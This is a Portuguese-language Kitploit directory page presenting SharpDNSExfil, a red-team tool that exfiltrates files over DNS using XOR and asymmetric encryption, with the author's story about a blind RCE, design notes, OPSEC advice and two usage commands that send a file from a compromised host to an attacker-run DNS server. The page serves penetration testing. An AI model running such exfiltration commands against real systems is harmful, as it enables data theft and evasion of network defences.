Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/aniqfakhrul/sharpdnsexfil
Ferramentas de Criptografia/DescriptografiaExfiltração de DadosComando e ControleRed TeamingAnálise de DNS
GitHubaniqfakhrul/sharpdnsexfil

SharpDNSExfil

Ferramenta em C# para exfiltração de arquivos via DNS utilizando criptografia XOR e assimétrica, projetada para operações de red team com conexões de saída restritas.

Ver Repositório
132há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpDNSExfil

SharpDNSExfil é uma ferramenta de exfiltração escrita em C#. O principal objetivo é exfiltrar quaisquer arquivos "no disco" sem ter que se preocupar com conexões de saída restritas.

Pré-requisito

  • A máquina remota deve ser capaz de resolver DNS

Por que fiz isso?

Eu obtive um RCE cego durante meu engagement e descobri que a máquina remota tem proteção de firewall que não permite conexões de saída e dificultou a obtenção de uma conexão reversa. A boa notícia é que o servidor DNS pode resolver domínios públicos e consegue me alcançar via DNS. O problema é que ainda não consegui um reverse shell, conseguia ler algumas saídas pequenas, mas no bueno. Então tive a ideia de automatizar o processo apenas via DNS e percorrer todas as etapas recursivamente, e finalmente funcionou!

RESSALVA: Todo o processo foi testado apenas através de servidor DNS público personalizado, mas não foi totalmente testado em ambiente corporativo real. Portanto, use por sua conta e risco!

TL;DR: Como Fazer

O que considerar?

Todos os bytes exfiltrados são operados com XOR com uma chave gerada aleatoriamente. Você pode pensar: a chave estará então em texto simples no nível de rede (wireshark fará isso). Com a opção --encrypt, é aqui que a criptografia assimétrica entra em ação, uma chave pública hard-coded irá criptografar a chave XOR. A máquina local (você) esperará uma forma criptografada da chave, o script python descriptografará automaticamente a chave com sua chave privada hard-coded. O restante dos dados transmitidos será retornado a XOR para seus bytes originais. Portanto, sempre troque os pares de chave, por favor

Antes da criptografiaApós a criptografia

Uso

  • Configure o servidor DNS com o script python dnsserver.py. As opções são as seguintes
root@kitploit:~
python3 dnserver.py --udp --port 53 --host 192.168.0.102
  • Execute o executável na máquina remota.
root@kitploit:~
SharpDNSExfil.exe --file C:\path\to\file --server 192.168.0.102

Considerações de OPSEC

As etapas e processos do SharpDNSExfil devem ser executados totalmente em memória sem tocar no disco para evitar deixar lixo durante o engagement. O SharpDNSExfil informará cada etapa ou processo que executa em segundo plano com a opção --verbose. Cada byte enviado é codificado com XOR e a chave será posteriormente criptografada com criptografia assimétrica para evitar chave em texto simples no tráfego de rede. Tenha cuidado extra e sempre tome notas e faça a limpeza na propriedade do cliente.

Créditos

  • Incrível script DNSServer por @pklaus
Baixar ferramenta